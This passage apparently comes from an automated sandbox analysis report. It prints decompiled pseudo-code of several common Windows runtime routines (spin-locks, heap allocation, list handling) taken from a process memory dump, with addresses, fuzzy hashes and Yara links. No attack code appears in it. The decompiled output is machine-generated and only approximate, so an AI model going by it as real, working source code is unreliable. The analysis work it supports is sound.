								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x5318628; // 0x0
						_t105 = _v28;
						_t80 =  *0x531862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x52efb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x0524dbe9
0x0524dbf2
0x0524dbf7
0x0524dbf9
0x0524dbfc
0x0524dc00
0x0524dc03
0x0524dc14
0x0524dd54
0x0524dd54
0x0524dd54
0x0524dc18
0x0524dc1d
0x0524dc1d
0x0524dc32
0x0524dc3b
0x0524dc3e
0x0524dc46
0x0524dd5b
0x0524dd62
0x0524dd64
0x0524dd67
0x0524dd69
0x0524dd6b
0x0524dd6e
0x0524dd70
0x0524dd73
0x0524dd73
0x00000000
0x0524dc4c
0x0524dc4e
0x05293ae3
0x05293ae8
0x05293aea
0x0524dce7
0x0524dce9
0x0524dcec
0x0524dcee
0x0524dcf0
0x0524dcf3
0x0524dcf5
0x05293af2
0x05293af5
0x05293af5
0x0524dd06
0x0524dd08
0x0524dd0b
0x0524dd12
0x05293b08
0x0524dd18
0x0524dd18
0x0524dd18
0x0524dd20
0x0524dd23
0x05293b16
0x05293b16
0x0524dd29
0x0524dd2d
0x0524dd36
0x0524dd40
0x0524dd51
0x0524dd51
0x0524dc54
0x0524dc59
0x0524dc59
0x0524dc5e
0x0524dc5e
0x0524dc63
0x0524dc66
0x0524dc6b
0x0524dc78
0x0524dc7b
0x0524dc81
0x0524dc81
0x0524dc83
0x0524dc89
0x00000000
0x00000000
0x0524dd7b
0x0524dd7b
0x0524dc8f
0x0524dc8f
0x0524dc92
0x0524dc99
0x0524dc9f
0x0524dca5
0x0524dcaa
0x0524dcaa
0x0524dcb3
0x0524dcb8
0x0524dcbb
0x0524dcc1
0x0524dccf
0x0524dcd2
0x0524dcd5
0x0524dcd7
0x0524dcda
0x0524dcdc
0x0524dcdc
0x0524dce2
0x0524dce4
0x00000000
0x0524dce4

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201dd4903ae2621a4f14c0b9ad5103d36217a58b8c93c5a23cd738d03dd8ae50
Instruction ID: 324e1a4614493c715c4e2a3140be985948ccfe041f93cec99ff9132e5d2573e8
Opcode Fuzzy Hash: 201dd4903ae2621a4f14c0b9ad5103d36217a58b8c93c5a23cd738d03dd8ae50
Instruction Fuzzy Hash: 485191B2A20616DFCB18CF68C490AAEFBF6BF48310F208559D559A7340DB70AD44CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0523EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0523EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E05229080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E05222D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x0523ef4b
0x0523ef4d
0x0523ef57
0x0523f0bd
0x0523f0c2
0x0523f0d2
0x0523f0d2
0x0523f0c2
0x0523ef5d
0x0523ef5f
0x0523ef67
0x0523ef6a
0x0523ef6d
0x0523ef74
0x0523ef7f
0x0523ef82
0x0523ef82
0x0523ef86
0x0523ef88
0x0523ef8c
0x0523ef8f
0x0523ef8f
0x0523ef8f
0x00000000
0x0523ef91
0x0523ef93
0x0523efc4
0x0523efc4
0x0523efc4
0x0523efca
0x0523efd0
0x0523f0a6
0x00000000
0x00000000
0x0523f0af
0x0528bb06
0x0528bb0a
0x0523f0b5
0x0523f0b5
0x0523f0b5
0x0523f0b5
0x00000000
0x0523efd6
0x0523efd9
0x0523f0de
0x0523f0e2
0x0523efdf
0x0523efdf
0x0523efdf
0x0523efe5
0x0528bafc
0x0528bafc
0x0523efe5
0x0523efeb
0x0523efed
0x0523f00f
0x0523f011
0x0523f01a
0x0523f01d
0x0523f021
0x0523f028
0x0523f029
0x0523f029
0x0523f02c
0x00000000
0x0523f02c
0x0523eff3
0x0523eff9
0x0523f0ea
0x0523f0ed
0x0523f0ef
0x00000000
0x0523f0ef
0x0523f003
0x0528bb12
0x0523f045
0x0523f049
0x0523f051
0x0523f09e
0x0523f0a0
0x0523f0a0
0x0523f09e
0x0523f053
0x0523f064
0x0523f064
0x0523f06b
0x0528bb1a
0x0528bb1a
0x0523f071
0x0523f071
0x0523f07d
0x0523f082
0x0523f08f
0x0523f08f
0x0523f009
0x0523f00d
0x00000000
0x0523f00d
0x0523efd0
0x0523ef97
0x0523efa5
0x0523efaa
0x00000000
0x0523efac
0x0523efac
0x0523efac
0x00000000
0x0523efb2
0x0523f036
0x0523f03a
0x0523f040
0x0523f090
0x00000000
0x0523f092
0x0523f042
0x00000000
0x0523f042
0x0523efb7
0x0523efb9
0x0523efbc
0x0523efb0
0x0523efb0
0x00000000
0x0523efbe
0x0523efbe
0x0523efc1
0x00000000
0x0523efc1
0x0523efbc
0x0523efaa
0x0523ef91

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 7ada0e179110150cedbdea3a0699b792b6fff13ed630a46753bb8b3c152d660c
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 48512BB0E24246DFDB10CB68D1C6BBEBBB2BF45314F1881E8D45953281C3B9A98DC741

Uniqueness

Uniqueness Score: -1.00%

Function 052F740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E052F740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0527D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0526F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L05244620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L05244620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0526F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L05244620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x052f740d
0x052f740d
0x052f7412
0x052f7413
0x052f7416
0x052f7418
0x052f741c
0x052f741f
0x052f7422
0x052f7422
0x052f7428
0x052f742a
0x052f742a
0x052f7451
0x052f7432
0x052f744f
0x052f744f
0x00000000
0x052f7434
0x052f7438
0x052f7443
0x052f7517
0x052f7517
0x052f751a
0x052f7535
0x052f7520
0x052f7527
0x052f752c
0x052f7531
0x052f7533
0x00000000
0x052f7533
0x00000000
0x052f7531
0x052f754b
0x052f754f
0x052f755c
0x052f755c
0x052f755f
0x052f7560
0x052f7561
0x052f7562
0x052f7563
0x052f7568
0x052f756a
0x052f756c
0x052f756d
0x052f756d
0x052f756f
0x052f7572
0x052f7574
0x052f7577
0x052f757c
0x052f757f
0x00000000
0x052f7551
0x052f7551
0x052f7551
0x052f7553
0x052f7553
0x052f7449
0x052f7449
0x052f744c
0x052f744c
0x00000000
0x052f744c
0x052f7443
0x052f750e
0x052f7514
0x052f7514
0x052f7455
0x052f7469
0x052f746d
0x00000000
0x052f7473
0x052f7473
0x052f7476
0x052f7480
0x052f7484
0x052f748e
0x052f7493
0x052f7493
0x052f7496
0x052f7499
0x052f74a1
0x052f74b1
0x052f74b5
0x00000000
0x052f74bb
0x052f74c1
0x052f74c1
0x052f74c4
0x052f74c5
0x052f74c6
0x052f74c7
0x052f74c8
0x052f74cd
0x00000000
0x052f74d3
0x052f74d3
0x052f74d6
0x052f74d8
0x052f74db
0x052f74dd
0x052f74e0
0x052f74e7
0x052f74ee
0x052f74ee
0x052f74f4
0x052f74f9
0x00000000
0x052f74fb
0x052f74fb
0x052f74fd
0x052f7500
0x052f7503
0x052f7505
0x052f7505
0x052f74f9
0x00000000
0x052f74cd
0x052f74b5
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: c15d8a42a77c09b8ef4673b5606d8b0e3c47e3df0ef65a5cbb12f8369b34d532
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: DC516971610606EFDB15CF54E980A96FBB5FF45304F1880BAEA089F256E371E986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05252990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E05252990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x52fff00);
				E0527D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x5201664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0526E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x5201668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E052A51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x520166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E05252AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E05236600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E05252C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0523EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E05252AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E05252C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E05252ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0527D0D1(_t62);
				goto L28;
			}

0x05252990
0x05252992
0x05252997
0x052529a3
0x052529a6
0x052529ab
0x052529ad
0x052529b2
0x05295c80
0x052529b8
0x052529b8
0x052529bb
0x052529c0
0x052529c5
0x052529c6
0x052529c6
0x052529cb
0x00000000
0x00000000
0x052529cd
0x052529d0
0x052529d9
0x052529db
0x052529dd
0x05252a7f
0x05252a84
0x05252a87
0x05252a89
0x05295ca1
0x05295ca3
0x00000000
0x05252a8f
0x05252a8f
0x00000000
0x05252a8f
0x00000000
0x052529e3
0x052529e3
0x052529e3
0x00000000
0x052529e3
0x052529dd
0x00000000
0x052529db
0x052529e6
0x052529e9
0x052529eb
0x052529ed
0x052529f3
0x052529f5
0x052529f8
0x052529fa
0x05252a97
0x05252a9a
0x05252a9d
0x05252add
0x00000000
0x05252a9f
0x05252aa2
0x05252aa5
0x05252aa8
0x05252aab
0x05295cab
0x05295caf
0x05295cc5
0x05295cda
0x05295cdc
0x05295cdf
0x05295ce5
0x00000000
0x05295ceb
0x05295ced
0x05295cee
0x00000000
0x05295cee
0x05295cb1
0x05295cb4
0x05295cb9
0x05295cbb
0x00000000
0x05295cbd
0x05295cbd
0x00000000
0x05295cbd
0x05295cbb
0x05252ab1
0x05252ab1
0x05252ac4
0x05252ac6
0x05252ac6
0x00000000
0x05252ac6
0x05252aab
0x00000000
0x05252a00
0x05252a09
0x05252a0e
0x05252a21
0x05252a24
0x05252a35
0x05252a3a
0x05252a3d
0x05252a42
0x05252a59
0x05252a59
0x05252a5c
0x05252a5f
0x05252a5f
0x052529fa
0x052529f3
0x05252a64
0x05252a64
0x05252a6b
0x05252a6b
0x05252a6d
0x05252a72
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0401661d28518d50844117f0b26a8eac6b379ea8e25ddbbbfadbd3187ec5e71d
Instruction ID: 0833338d3f808d497f5c41c1e1cebe79432a307b3d425c1980e1529f33f96d42
Opcode Fuzzy Hash: 0401661d28518d50844117f0b26a8eac6b379ea8e25ddbbbfadbd3187ec5e71d
Instruction Fuzzy Hash: 4F515876A2020ADFDF25DF55C880AEEBBB6BF48320F158055EC15AB3A0D3759952CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05254D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E05254D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x531d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0526FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x5317bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0526B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L05244620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0522CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0526B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0526F380(_t67 + 0xc, 0x5205138, 0x10) == 0) {
								 *0x53160d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E05254F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E05254E70(0x53186b0, 0x5255690, 0, 0) != 0) {
					_t46 = E0522CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x05254d3b
0x05254d4d
0x05254d53
0x05254d58
0x05254d65
0x05254d6c
0x05254d71
0x05254d77
0x05254d7f
0x05254d8c
0x05254d8e
0x05254dad
0x05254db0
0x05254db7
0x05254db8
0x05254db9
0x05254dba
0x05254dbb
0x05254dc1
0x05254dc8
0x05254dcc
0x05254dd5
0x05254dde
0x05254ddf
0x05254de0
0x05254de1
0x05254de6
0x05254de7
0x05254de9
0x05254df3
0x00000000
0x00000000
0x05296c7c
0x05296c8a
0x05296c8a
0x05296c9d
0x05296ca7
0x05296cac
0x05296cb2
0x05296cb9
0x00000000
0x05296cbf
0x05296cbf
0x00000000
0x05296cbf
0x05296cb9
0x05254dfb
0x05296ccf
0x05296cd3
0x05254e32
0x05254e39
0x05296ce0
0x05296cf2
0x05296cf2
0x05296ce0
0x05254e3f
0x05254e41
0x05254e51
0x05254e51
0x05254e03
0x05254e03
0x05254e09
0x05254e0f
0x05254e57
0x00000000
0x00000000
0x05254e1b
0x05254e30
0x05254e5b
0x05254e5b
0x00000000
0x05254e30
0x05254e11
0x05254e11
0x05254e16
0x00000000
0x05254e16
0x05254e01
0x00000000
0x05254e01
0x05254da5
0x05296c6b
0x00000000
0x05254dab
0x05254dab
0x00000000
0x05254dab

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20dc1112ddd226d370113afafee9525a5fbb8d141ba1931ae2bba11a2df84b9a
Instruction ID: 54539fc04337055d811291db09aeedf0dc69d530a7b35b2570e56014ac4ab5f8
Opcode Fuzzy Hash: 20dc1112ddd226d370113afafee9525a5fbb8d141ba1931ae2bba11a2df84b9a
Instruction Fuzzy Hash: 9A419471760318AFDF25EF14CC85F6AB7AAEF45620F0440A9ED499B280D770ED848AD1

Uniqueness

Uniqueness Score: -1.00%

Function 05254BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E05254BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
